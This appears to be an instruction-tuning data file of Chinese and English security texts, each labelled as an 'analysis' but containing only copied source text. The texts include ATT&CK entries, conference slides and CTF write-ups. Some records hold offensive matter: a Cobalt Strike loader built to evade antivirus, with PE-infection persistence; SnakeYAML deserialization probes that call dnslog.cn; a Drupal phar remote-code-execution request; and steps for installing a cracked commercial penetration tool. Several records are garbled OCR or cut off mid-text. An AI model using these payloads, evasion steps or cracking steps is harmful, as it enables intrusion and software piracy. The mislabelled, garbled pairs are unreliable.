{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1596-003-搜索开放的技术数据库-数字签名 ## 来自ATT&CK的描述 在入侵受害者之前攻击者可以在公开的数字证书数据中搜索可在目标确定期间使用的有关受害者的信息数字证书由证书颁发机构CA颁发以加密方式验证签名内容的来源这些证书例如用于加密Web流量HTTPS SSL / TLS通信的证书包含有关注册组织的信息例如名称和位置 攻击者可以搜索数字证书数据以收集可操作的信息威胁方可以使用在线资源和查找工具来收集有关证书的信息引自SSLShopper Lookup 数字证书数据也可以从组织签名的工件中获得例如加密的网络流量中使用的证书随内容一起提供引自Medium SSL Cert 这些来源提供的信息可能为其他形式的侦察提供可能性例如[主动扫描](https://contribute.knowledge.qihoo.net/detail/technique/T1595)或[钓鱼](https://contribute.knowledge.qihoo.net/detail/technique/T1598)建立运营资源例如[开发能力](https://contribute.knowledge.qihoo.net/detail/technique/T1587)或[获取能力](https://contribute.knowledge.qihoo.net/detail/technique/T1588)或实现初始访问例如[外部远程服务](https://contribute.knowledge.qihoo.net/detail/technique/T1133)或[信任关系](https://contribute.knowledge.qihoo.net/detail/technique/T1199) ## 测试案例 证书透明度(Certificate Transparency,CT)是证书授权机构(CA)的一个项目证书授权机构会为每一个SSL/TLS证书发布到公共日志中一个SSL/TLS证书通常包含域名子域名和邮箱地址这些也经常成为攻击者非常希望获得的有用信息查找某个域名所属证书的最简单的方法就是使用搜索引擎搜索一些公开的CT日志 1. <https://crt.sh/> 2. <https://censys.io/> 3. <https://developers.facebook.com/tools/ct/> 4. <https://google.com/transparencyreport/https/ct/> ## 检测日志 无 ## 测试复现 无 ## 测试留痕 无 ## 检测规则/思路 无 ## 建议 许多此类攻击活动的发生率很高并且相关的误报率也很高并且有可能发生在目标组织的监测范围之外从而使防御者难以发现 检测工作可能会集中在攻击生命周期的相关阶段例如在\"初始访问\"阶段 ## 参考推荐 MITRE-ATT&CK-T1596-003 <https://attack.mitre.org/techniques/T1596/003/> 全流程信息收集方法总结 <https://www.freebuf.com/articles/database/195169.html> 知了堂信安笔记渗透测试之信息收集二 <https://zhuanlan.zhihu.com/p/86250911>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nUnraveling SCADA Protocols: Using Sulley Fuzzer - Ganesh Devarajan 2 Agenda Introduction to SCADA networks Overview SCADA Protocols Modbus DNP3 ICCP UCA 2.0 and IEC 61850 Standards SCADA Security Attack scenarios Past known attacks SCADA Fuzzer Demo Conclusion Future work 3 SCADA Definition SCADA Supervisory Control and Data Acquisition is defined as a common process control application that collects data from sensors on the shop floor or in remote locations and sends them to a central computer for management and control. Large scale distributed measurement and control system (North America) System that performs SCADA irrespective of the size and geographical distribution (Rest of the world) - Wikipedia SCADA is a technology that enables a user to collect data from one or more distant facilities and/or send limited control instructions to those facilities  Ronald L. Kurtz SCADA Use It is the vital component of many Critical Infrastructure They are used for sensing/managing real-time data Water Gas Electricity Refineries Nuclear plants Other manufacturing operations. 4 5 SCADA Infrastructure SCADA System Components Operator  Human Person responsible to make the Supervisory control decisions Might be present in the local or remote site. Human Machine Interface (HMI)  Presents data to the user/operator  GUIs, Schematics, Windows Master Terminal Unit (MTU)  Processes the data and presents it to HMI  Collects data from remote sites  Sends out queries and instructions to the remote nodes Communication channel  Internet, wireless, switched network, etc Remote Terminal Unit (RTU)  Sends the abstracted data to the MTU  RTU sends out control signals to the sensors and collects data values from them Traditional SCADA Networks 6 Motors, Drives, Actuators Robotics Sensors and other Input/Output Devices Programmable Logic Controllers (PLC) Human Machine Interface (HMI) PC Based Controllers Back-Office Mainframes and Servers (ERP, MES, CAPP, PDM, etc.) Control Network Gateway Offi", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n花了天时间学习WPF图形化开发,C#的图形化我没学过.原始Form实在是丑. 最后完成如下. 加密的RSA. 沙盒判断也很简单,星球发了很多次了.(原来那个) 物理机测试免杀360(主机到了,快乐) 然后想起来看到了个pe感染权限维持的项,趁着情好复现下. 我加到了改的Kit 前  流沙免杀加载器 RedTeamWing 加密式 加载式 图标 临时件 语 CPU 沙盒烧过 Sleep Disk UAC Mac 进程注 explore.exe 后续 msinLasm-Peiniect-dii peinject.cpp Welcome main.cpp EXPLORER main.asm peinject.cna shellexecute OPENEDITORS main.asm PEINJECTDLL push push.o 这要修改偏移 81 pushoffsetpath cs-peinject nO 这要修改偏移 82 pushoffsetmethod 中 images push peiniect calL.dwordptrss:[esp+18h] Peinjectdil addesp,38h main.cpp 填旧的点 86 jimpmain Peinjecuall.vcxproj methoddb'\"open\". Peinjectdll.vcxprojfilters pathdb\"c:usersisunmnDesKOpITTHexEdi.xe\" shellcode调试 89 nop shellexecute 90 nop nop mantasm nop shellexecutevcxproj 93 mainendp shellexecuteycxproj.filters 94 endmain gitattributes 95 gitignore Peinjcctdll.sln README.md TIMELINE Ln95.Col1 master 要注意个问题. RIkYIewAttacksReportingHelp 0图三 internal 11stener external 1as pid computer rch process 192.168.123.77 2h DESKTOP-9IPJBEB 192.168.123.77 http-1ocal 7256 192.168.123.77 192.168.123.77 DESKTOP-9IPJBEE http-1ocal 18784 ArRexe DESKTOP-9IPJBEG 192:16123.77 http-1ocal 192.16.123.77 18588 Interact DECVTOAATAIREA 192.168.123.77 192.168.123.77 64 37872 http-1ocal In1T101ACCEBS Wingkit 53046 192.168.123.77 192.1686.123.77 arRe 11m Access 启动 PE成染 史克染的件路径 Explore 注在表 Peinject Pivoting 张向移动 不捉仅 Spawn riviiege Hisc Session redentinl Set/updateDefaults beacon192.168123.7年18588 BEacSHarpTaskT1853 EventLog FILe192168.14 Scripts ScriptConso1e thePpl PTaskcdBcacontofindswchostoxningusAandmalkeittho [waskedbeacontobecomentaractlve [阳Inncttoflapath:PmgrmFles(Stem. Taskedbeacontohject/ser/ying/Redtemw/mktncu Waitingafewseccndsforpeinjectconplete... perstensepenjectccmelete Thostcallodhcme,sant76271bytos FutLrpoSTCbEWbESPAYncDtHFakOPPIDOT NTALTHORISYSTEM SchoteNc2o9 Taskedbercontospoof960amoontmocos Tt@becontomtucheh hostcalledhame,sent12 ppd960kinadiftarentdesktos(pdm hastcalledhcme,sent260624bytes 特别是script_recource不能错. 然后设置好路径 我是的steam.直接执,steam打开就会上线. ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#BHUSA @BlackHatEvents To Flexibly Tame Kernel Execution With Onsite Analysis Xuhua Ding Singapore Management University #BHUSA @BlackHatEvents Information Classification: General SMU Classification: Restricted Outline  Review of existing dynamic kernel analysis techniques  Introduction of the onsite analysis infrastructure (OASIS)  Analysis primitives provided by OASIS  Two examples of OASIS analyzers: function monitor and control flow tracer  Discussions 2 #BHUSA @BlackHatEvents Information Classification: General SMU Classification: Restricted Existing Approach 1: Code Instrumentation Static code instrumentation:  Linux kernel cooperates with GCC to add Kernel Coverage (KCOV) and Kernel Address SANitizer(KASAN) code into the kernel image at compilation time.  KDB, KGDB Dynamic Binary Instrumentation (DBI)  DBI has been applied to kernel analysis as well: Cobra [S&P'06], PinOS [VEE07], GILK [TOOLS02], PEMU [VEE15]. 3 #BHUSA @BlackHatEvents Information Classification: General SMU Classification: Restricted Code Instrumentation The Idea: to mix the analysis code and the kernel code into one binary. Pros: native control, introspection and modification Cons: intrusive, no/weak transparency or security kernel code kernel code analysis code Share execution flow and address space 4 #BHUSA @BlackHatEvents Information Classification: General SMU Classification: Restricted Existing Approach 2: Hardware-assisted Analysis Hypervisor based on Hardware Virtualization (VT-x)  Ether [CCS08], Gateway [NDSS11], Spider [ACSAC13] Intel SMM + Performance Monitoring Unit (PMU)  MALT [S&P15] TrustZone + ARM debugging facilities  Ninja [USENIX Security17] 5 #BHUSA @BlackHatEvents Information Classification: General SMU Classification: Restricted Hardware-assisted Analysis The Idea: to trap the target to an isolated and more privileged environment, e.g., x86 VMX root mode, SMM mode, or ARM SecureWorld Pros: transparency and security Cons: inflexibility to control and introspect - when/whe", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n@Y4tacker SnakeYAML实现Gadget探测 思路来源 今天在学习SnakeYAML的反序列化的时候想到个新的探测payload上之前有个SPI 那个链可以有通过URLClassloader检测 这个的话主要是因为SnakeYAML在解析带键值对的集合的时候会对键调hashCode法因此 会触发DNS解析 因此通过构造URL对象后简单加个: 1让他成为个mapping 不过会触发多次 String poc = \"!!java.net.URL [null, \\\"[http://osrwbf.dnslog.cn] (http://osrwbf.dnslog.cn/)\\\"]: 1\"; 实现探测Gadget 不完美的构造 这再补充个探测gadget思路在刚刚的思路上实现了探测gadget如果string存在才会接着 触发URLDNS不存在就不会 当然上的payload又遇到了问题如果对象的构造法私有化就不为什么呢看下 更完善的案 解决案是 String poc = \"key: [!!java.lang.String []: 0, !!java.net.URL [null, \\\" [http://5ydl3f.dnslog.cn](http://5ydl3f.dnslog.cn/)\\\"]: 1]\"; String poc = \"key: [!!java.lang.String {}: 0, !!java.net.URL [null, \\\" [http://5ydl3f.dnslog.cn](http://5ydl3f.dnslog.cn/)\\\"]: 1]\"; 这个与上的区别不样在于探测的类后[]或{}对应的分别是ConstructSequence与 ConstructMapping光这样说还是不够清楚就详细来说可以看 到 org.yaml.snakeyaml.constructor.Constructor.ConstructSequence#construc t 的处理逻辑如下我们只看最关键的地 可以看到这获取构造函数调的是 node.getType().getConstructors() 也就是只会 获得公有的构造函数因此会出错 如果换成了 {} 则会调  org.yaml.snakeyaml.constructor.Constructor.ConstructMapping#construct 这先调 createEmptyJavaBean 实例化对象可以看到这是getDeclaredConstructor就 算是私有也Ok 那么你会好奇如果我想要调带参数的构造函数怎么办那肯定不那SnakeYAML如何处 理的呢也就是后调了 constructJavaBean2ndStep 与本探测问题关简单来 说其实就是在while循环不断通过反射设置值 总结 有时候细节也确实很重要昨晚匆匆忙忙却忽略了很多细节说起来也是惭愧 protected Object createEmptyJavaBean(MappingNode node) { try { java.lang.reflect.Constructor<?> c = node.getType().getDeclaredConstructor(); c.setAccessible(true); return c.newInstance(); } catch (Exception var3) { throw new YAMLException(var3); } }", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nInvestigating the Practicality and Cost of Abusing Memory Errors with DNS Project Bitfl1p by Luke Young $ whoami Undergraduate Student - Sophomore Founder of Hydrant Labs LLC This presentation is based upon research conducted as a employee of Hydrant Labs LLC and was not supported or authorized by any previous, current, or future employers with the exception of Hydrant Labs LLC. Email: luke@hydrantlabs.org LinkedIn: https://www.linkedin.com/in/innoying Twitter: @innoying Agenda What is a bitflip and their history What is bit-squatting and how it works Project Bitfl1ps use of bit-squatting Code and partial data release Q&A What is a bitflip? or 1 0 0 1 What causes a bitflip? Heat Electrical Problems Radioactive Contamination Cosmic Rays History of bitflips Using Memory Errors to Attack a Virtual Machine - Princeton University in 2003 Rowhammer Flipping Bits in Memory Without Accessing Them: An Experimental Study of DRAM Disturbance Errors - Carnegie Mellon University in 2014 Exploiting the DRAM rowhammer bug to gain kernel privileges - Googles Project Zero What is bit-squatting? Named by Artem Dinaburg Purchasing of domain names that are one bit away from the legitimate name. c n n . c o m 01100011 01101110 01101110 00101110 01100011 01101111 01101101 c o n . c o m 01100011 01101111 01101110 00101110 01100011 01101111 01101101 Example of bit-squatting Generating valid bit-squats e 01100101 u m a g d 01100101 01101101 01100001 01100111 01100100 www.defcon.org Generating valid bit-squats www.defcon.org n 01101110 . 00101110 o 01101111 / 00101111 $ bf-lookup www.defcon.org vww.defcon.org uww.defcon.org sww.defcon.org gww.defcon.org 7ww.defcon.org wvw.defcon.org wuw.defcon.org wsw.defcon.org wgw.defcon.org w7w.defcon.org wwv.defcon.org wwu.defcon.org wws.defcon.org wwg.defcon.org ww7.defcon.org wwwndefcon.org www.eefcon.org www.fefcon.org www.lefcon.org www.tefcon.org www.ddfcon.org www.dgfcon.org www.dafcon.org www.dmfcon.org www.dufcon.org www.degcon.org www.dedcon.org www.d", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## Frog Fractions 2(reversing, 5 points, 65 solves) Turns out Frog Fractions 2 is not battletoads We're given a 64bit elf file, let's start by disassembling it and describing important points in the program. The program uses a library called libgmp to handle big numbers, it makes the debugging less friendly. After analysing the binary come we come up with a replacement script in python: ```python data = [] #scraped data array from binary primes = [] #init primes somewhere v11 = 1019 line = \"A sample line input\" #our input def factor_print(a1): v4 = a1 for x in range(200): c = 0 while(v4 % primes[x] == 0): v4 = v4/primes[x]; c = c+1 if(c != 0): sys.stdout.write(chr(c)) print for i in range(len(line)): v11 = v11* pow(primes[i], ord(line[i])) j =0 while(j < len(data)/2): v6 = data[j*2] v7 = data[j*2+1] v10 = v11*v6 if(v10 % v7 == 0): v11 = v10/v7 j = 0 else: j = j+1 factor_print(v11) ``` While searching through the binary we stumble into two big, interesting integers: 62834...(6955 chars) and 50209...(8423 chars). What's interesting about them is that if we run them through our `factor_print` function we get the 2 messages available: `Nope! You need to practice your fractions!` `Congratulations! Treat yourself to some durians!` So we need to find a line that reproduces the second output message, we do that by reversing the function: ```python def crack(v11): j = 0 while(j < len(data)/2): v7 = data[j*2] v6 = data[j*2+1] v10 = v11*v6 if(v10 % v7 == 0): v11 = v10/v7 j = 0 else: j = j+1 factor_print(v11) ``` Which gives us the desired output: `KEY{(By the way, this challenge would be much easier with a cybernetic frog brain)}` The full source is available [here](https://gist.github.com/nazywam/0634494b4b1c0ffd46a3)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Writeup Ekoparty CTF 2016 Team: nazywam, other019, c7f.m0d3, cr019283, msm, rev, shalom ![](./score.png) ### Table of contents * [F#ck (re 50)](re_50) * [RrEeGgEeXx (re 75)](re_75) * [Bleeding (pwn 50)](pwn_50) * [My first service I (pwn 100)](pwn_100) * [Super duper advanced attack (web 100)](web_100) * [Old but gold (misc 250)](misc_250) * [Vsftpd dejavu (for 150)](for_150) * [Old times (re 100)](re_100) * [Metadata (fbi 50)](fbi_50) * [Carder (web 150)](web_150) * [Hacker In Disguise (for 100)](for_100)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1190-CVE-2019-6339-Drupal 远程代码执行漏洞 ## 来自ATT&CK的描述 使用软件数据或命令来利用面向Internet的计算机系统或程序中的弱点从而导致意外或无法预期的行为系统的弱点可能是错误故障或设计漏洞这些应用程序通常是网站但是可以包括数据库例如SQL标准服务例如SMB 或SSH以及具有Internet可访问开放的任何其他应用程序例如Web服务器和相关服务根据所利用的缺陷这可能包括利用防御防卫 如果应用程序托管在基于云的基础架构上则对其进行利用可能会导致基础实际应用受到损害这可以使攻击者获得访问云API或利用弱身份和访问管理策略的路径 对于网站和数据库OWASP排名前10位和CWE排名前25位突出了最常见的基于Web的漏洞 ## 测试案例 Drupal是使用PHP语言编写的开源内容管理框架CMF它由内容管理系统CMS和PHP开发框架Framework共同构成连续多年荣获全球最佳CMS大奖是基于PHP语言最著名的WEB应用程序人们通常将Drupal拿来和另一个著名的开源CMS即Joomla进行比较由于难度更大而中文资源较Joomla更少Drupal在中国的普及程度较Joomla更低 Drupal core 7.62之前的7.x版本8.6.6之前的8.6.x版本和8.5.9之前的8.5.x版本中的内置phar stream wrapperPHP存在远程代码执行漏洞远程攻击者可利用该漏洞执行任意的php代码 在Drupal Core版本7.x之前的7.62,8.6.x之前的8.6.6和8.5.x之前的8.5.x; 在对phar://URI执行文件操作时PHP的内置phar流包装器中存在一个远程执行代码漏洞一些Drupal代码corecontrib和custom可能正在对用户输入执行文件操作从而暴露于此漏洞 ## 检测日志 HTTP ## 测试复现 具体利用过程可参考:<https://blog.csdn.net/qq_40989258/article/details/104970882> ## 测试留痕 ```yml POST /admin/config/media/file-system HTTP/1.1 Host: 172.17.41.106:8080 Connection: keep-alive Content-Length: 340 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://172.17.41.106:8080 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://172.17.41.106:8080/admin/config/media/file-system Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,be;q=0.8 Cookie: 8ciy_2132_ulastactivity=1747%2BBj3bIdraT%2FhUrMgbV9hBzsnRDad5PbJ4P8FXwvrlsfGVbOx; 8ciy_2132_nofavfid=1; 8ciy_2132_saltkey=h7AR59Bx; 8ciy_2132_lastvisit=1603172255; SESS69d0dbb3a7ccb7aab441a7efa90bb8ae=WSVdSnEkxmap5tU9TGG21HegyssjX2hEk8BkBOBEyiU file_temporary_path=phar%3A%2F%2F.%2Fsites%2Fdefault%2Ffiles%2Fpictures%2F2020-10%2Fblog-ZDI-CAN-7232-cat.jpg&file_default_scheme=public&temporary_maximum_age=21600&form_build_id=form-iN0z3-CojyQl7Pl", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 How To Shot Web (Better hacking in 2015) 2 Jason Haddix  Bugcrowd  Director of Technical Ops  Hacker & Bug hunter  #1 on all-time leaderboard bugcrowd 2014 whoami @jhaddix 3 Hack Stuff Better (and practically) What this talks about... AndLOTS of memes. only some are funny 4 Step 1: Cut a hole in a box... j/k Step 1: Started with my bug hunting methodology Step 2: Parsed some of the top bug hunters research (web/mobile only for now) Step 3: Create kickass preso Topics? BB philosophy shifts, discovery techniques, mapping methodology, parameters oft attacked, useful fuzz strings, bypass or filter evasion techniques, new/awesome tooling More Specifically 5 Philosophy 6 Differences from standard testing Single-sourced Crowdsourced  looking mostly for common-ish vulns  not competing with others  incentivized for count  payment based on sniff test  looking for vulns that arent as easy to find  racing vs. time  competitive vs. others  incentivized to find unique bugs  payment based on impact not number of findings 7 The regular methodologies 8 Discovery 9 Find the road less traveled  means find the application (or parts of an application) less tested. 1. *.acme.com scope is your friend 2. Find domains via Google (and others!) a. Can be automated well via recon-ng and other tools. 3. Port scan for obscure web servers or services (on all domains) 4. Find acquisitions and the bounty acquisition rules a. Google has a 6 month rule 5. Functionality changes or re-designs 6. Mobile websites 7. New mobile app versions 10 Tool: Recon-ng script (enumall.sh) https://github.com/jhaddix/domain 11 12 LMGTFY 13 LMGTFY 14 15 https://www.facebook.com/notes/phwd/facebook-bug-bounties/707217202701640 16 Port scanning is not just for Netpen! A full port scan of all your new found targets will usually yield #win:  separate webapps  extraneous services  Facebook had Jenkins Script console with no auth  IIS.net had rdp open vulnerable to MS12_020 nmap -sS -A -PN -p- --script=http-title dontscanm", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWhat the Watchers See Weaknesses in Municipal Mesh Network Deployments Dus8n Hoffman & Thomas (TK) Kinsey DEF CON 22 Dus8n Hoffman the researcher, not the actor :(  Senior Engineer @ Exigent Systems  Principal @ various other concerns Thomas (TK) Kinsey  Senior Engineer @ Exigent Systems  Principal @ 3Kappa Research What The Watchers See How it started  open wifi network(s) available What The Watchers See The Transparent Society by David Brin hRp://archive.wired.com/wired/archive/4.12/Wransparent_pr.html What The Watchers See Why are municipali8es deploying these networks? City services: police, traffic, 2-way audio, site monitoring, force mul8plier, shrinking budgets :( What The Watchers See Network implementa8on Wireless mesh Mo8va8ons: lower cost, shorten install 8me, no trenching, permi]ng What The Watchers See Project / Integra8on Vendors E.g., LeverageIS hRp://www.leverageis.com/ What The Watchers See What The Watchers See Implementa8on Hardware Common off-the-shelf hardware e.g. Fire8de/UNICOM, Bosh cameras, DVR/NVRs What The Watchers See Our Lab What The Watchers See What The Watchers See Fire8de specific info: filesystem reverse engineering etc. What The Watchers See Implementa8on Protocols 802.11 2.4Ghz, 5Ghz, & 900Mhz Mesh: Open standards vs AutoMesh Interes8ngly, 2.4Ghz is in use, not men8oned hRp://www.cityofredlands.org/sites/default/files/Purchasing/Public %20Safety%20Camera%20System%20Admin%202014%20RFP %205.5.14.pdf What The Watchers See Mesh in general:  Mul8ple wireless paths  Nodes arent guaranteed a reliable connec8on to the backhaul  Protocol provides node IDs, mesh health info, etc. What The Watchers See Wired Mesh What The Watchers See Mesh in Our Specific Case hRp://www.cityofredlands.org/sites/default/files/Purchasing/Public%20Safety%20Camera%20System%20Admin%202014%20RFP%205.5.14.pdf What The Watchers See AutoMesh Specifics  Proprietary & details not published  19 patents to date What The Watchers See AutoMesh Specifics External headers look normal Wha", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nU . S. D E P A R T M E N T O F C O M M E R C E N A TI O N A L T E L E C O M M U N I C A T I O N S & I N F O R M A TI O N A D M I N IS T R A T I O N MOBILE (AERONAUTICAL TELEMETERING) S) 5.68 5.73 5.90 5.95 6.2 6.525 6.685 6.765 7.0 7.1 7.3 7.35 8.1 8.195 8.815 8.965 9.040 9.4 9.5 9.9 9.995 10.003 10.005 10.1 10.15 11.175 11.275 11.4 11.6 11.65 12.05 12.10 12.23 13.2 13.26 13.36 13.41 13.57 13.6 13.8 13.87 14.0 14.25 14.35 14.990 15.005 15.010 15.10 15.6 15.8 16.36 17.41 17.48 17.55 17.9 17.97 18.03 18.068 18.168 18.78 18.9 19.02 19.68 19.80 19.990 19.995 20.005 20.010 21.0 21.45 21.85 21.924 22.0 22.855 23.0 23.2 23.35 24.89 24.99 25.005 25.01 25.07 25.21 25.33 25.55 25.67 26.1 26.175 26.48 26.95 26.96 27.23 27.41 27.54 28.0 29.7 29.8 29.89 29.91 30.0 UNITED STATES THE RADIO SPECTRUM NON-GOVERNMENT EXCLUSIVE GOVERNMENT/ NON-GOVERNMENT SHARED GOVERNMENT EXCLUSIVE RADIO SERVICES COLOR LEGEND ACTIVITY CODE NOT ALLOCATED RADIONAVIGATION FIXED MARITIME MOBILE FIXED MARITIME MOBILE FIXED MARITIME MOBILE Radiolocation RADIONAVIGATION FIXED MARITIME MOBILE Radiolocation FIXED MARITIME MOBILE FIXED MARITIME MOBILE AERONAUTICAL RADIONAVIGATION AERONAUTICAL RADIONAVIGATION Aeronautical Mobile Maritime Radionavigation (Radio Beacons) MARITIME RADIONAVIGATION (RADIO BEACONS) Aeronautical Radionavigation (Radio Beacons) 3 9 14 19.95 20.05 30 30 59 61 70 90 110 130 160 190 200 275 285 300 3 kHz 300 kHz 300 kHz 3 MHz 3 MHz 30 MHz 30 MHz 300 MHz 3 GHz 300 GHz 300 MHz 3 GHz 30 GHz Aeronautical Radionavigation (Radio Beacons) MARITIME RADIONAVIGATION (RADIO BEACONS) Aeronautical Mobile Maritime Radionavigation (Radio Beacons) AERONAUTICAL RADIONAVIGATION (RADIO BEACONS) AERONAUTICAL RADIONAVIGATION (RADIO BEACONS) Aeronautical Mobile Aeronautical Mobile RADIONAVIGATION AERONAUTICAL RADIONAVIGATION MARITIME MOBILE Aeronautical Radionavigation MOBILE (DISTRESS AND CALLING) MARITIME MOBILE MARITIME MOBILE (SHIPS ONLY) MOBILE AERONAUTICAL RADIONAVIGATION (RADIO BEACONS) AERONAUTICAL RADIO", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSRC漏洞挖掘漫谈 星光 2 0 2 1 年 1 月 9 日 安 全 爱 好 者  对 自 动 化 漏 洞 挖 掘 有 着 自 己 的 见 解  获 得 2 0 2 1 T S R C 神 洞 猎 手 奖 星光 AK/ SK 信 息 泄 露  自 动发 现 SQ L 注 入 绕 WAF探 测 Hos t 碰 撞 检 测 实 现 域 名 监 控和 站 点变 化 监 控 AK/SK 信息泄露自动发现 一AK/SK 信息泄露自动发现 1.API& 响 应 包 中 2.J S 件 中 3.G it Hu b 中 4 .APK& 中 5 .& 等 场 景 1API&响应包中 通 过 B u r p 的 筛 选 功 能 搜 索  A K I D  一AK/SK 信息泄露自动发现 2JS件中  框 架 使   泛  J S 按 需 加 载  动 态 爬  难 触 发  寻 找 清 单  件 一AK/SK 信息泄露自动发现  正 则 匹 配 清 单 内 容  成 功 解 析 到 J S 路 径  路 径 等 信 息 提   正 则 匹 配 A K I D 一AK/SK 信息泄露自动发现 3GitHub中 搜 索  s e c r e t K e y R s e c r e t I D  等 关 键 字 一AK/SK 信息泄露自动发现 4APK中 通 过 爬  收 集 A P K R U R L 一AK/SK 信息泄露自动发现 具 p y t hon& 整 合 下  的软 件 wge t & 下 载 a p k 件 j a dx & 反 编 译 a p k gr e p & 匹 配 关 键 字 一AK/SK 信息泄露自动发现 SQL注入绕WAF探测 1 . 存 在 W A F   法 使  特 殊 语 句 2 . 构 建 不 同 语 句   对 响 应 3 . 注 释 语 句  效 果 最 好 4 . 单 引 号 闭 合 5 . 异 常 信 息 匹 配 6 . 等 二SQL注入绕WAF探测 Host 碰撞检测实现 三Host 碰撞检测实现 1 . W e b 服 务 器 配 置 不 当 2 . 修 改 H o s t 内  域 名 可 被 访 问 3 . 内  站 点 被 访 问 往 往 存 在 问 题 1.灯塔等具收集域名 2.解析域名找公IP和内域名 3.对公IP访问Host字段改成内域名 4.对响应找到结果 三Host 碰撞检测实现 误报处理 1 . 结 果 静 态 过 滤 根 据 经 验 只 保 留 2 0 0  3 0 1  3 0 2 R 状 态 码 2 . 动 态 过 滤 根 据 状 态 码  C o n t e n t 类 型  页  标 题  响 应 B o d y R 多 个 维 度 判 断 重 复 三Host 碰撞检测实现 域名监控和站点变化监控 四域名监控和站点变化监控 0.SRC资产更新频繁乏 1 .  域 名 监 控 周 期 性 对  域 名 进  发 现 并  对 原 有 数 据  发 现 新 域 名 进  消 息 通 知 2 . 站 点 变 化 监 控 周 期 性 发 现 可 访 问 站 点 并  对 原 有 数 据  发 现 新 站 点 进  消 息 通 知 四域名监控和站点变化监控 追 光 少 年 终 于 也 变 成 了 光", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nLockpicking Forensics by datagram www.lockpickingforensics.com www.lockwiki.com Defcon 17, 2009 www.defcon.org If you've been to a computer security conference recently you've no doubt seen people learning how to pick locks and crack safes. In the United States, interest in physical security has become a natural extension of the growing number of people interested in computer security. Many computer security events now host some form of lockpicking event, or an area where people can learn about locks, safes, and methods to compromise them, commonly known as a lockpicking village. At many of these events attendees focus on techniques to compromise locks and safes without discussing the forensic evidence they leave behind. Many instructors and speakers (the author included) portray many of these techniques in a manner that leads people to believe that they cannot be detected. In some cases this is true, but the vast majority of tools and techniques leave distinct forensic evidence. This paper describes forensic locksmithing, the field of forensic investigation that relates to lock and keying systems. Included in this paper is normal wear and tear, evidence left behind by a variety of entry techniques, keying system analysis, and the investigative process. This paper was written as a companion to my Defcon 17 (2009) talk and does not provide exhaustive coverage of the topic. A more thorough resource on forensic locksmithing (and contact information) is available at www.lockpickingforensics.com. Destructive vs. Covert vs. Surreptitious Entry Before we begin, we need to understand the difference between ways lock or keying systems are compromised. Methods of entry are generally classified as being destructive, covert, or surreptitious. Essentially, the distinction between them rests on the type of forensic evidence they leave behind. When we discuss whether or not methods of entry leave behind forensic evidence we restrict our view to lock- related evidence. It is quite ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1.准备操作系统windows2012 r2 x64(8G RAM,500G HDD) 2.对系统进行全局代理翻墙系统需要安装.net framwork 3.5 sp1以及microsoft visual c++ version 2019-2015) 3.点击CORE IMPACT19.1 4.结束CORE IMPACT的相关进程或者服务 5.将破解包中的program files 和programData目录所有文件复制到系统C盘下 6.将破解包中的三个序列号文件复制到C:\\Program Files (x86)\\Core Security\\Impact\\bin\\5372-8801-2329-7643-5724 目录下 7.重启电脑并打开Impact即可", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# MeePwn CTF 2018 Quals Team: shalom, eternal, rev, nazywam, c7f.m0d3, rodbert, msm ### Table of contents * [Bazik (crypto)](crypto_bazik) * [Omega Sector (web)](web_omega) * [Old school (crypto)](crypto_old_school) * [Image crackme (re/crypto)](re_image) * [PyCalcX 1 & 2 (web)](web_pycalcx) * [Ezchallz (web/crypto)](crypto_ezchallz) * [0xBAD Minton (web/pwn)](pwn_badminton) * [EX5 (re)](re_EX5) * [XSS (re)](re_XSS) * [BitBitBit (crypto)](crypto_bitbitbit)", "category": "text_analysis", "source": "security_papers"}
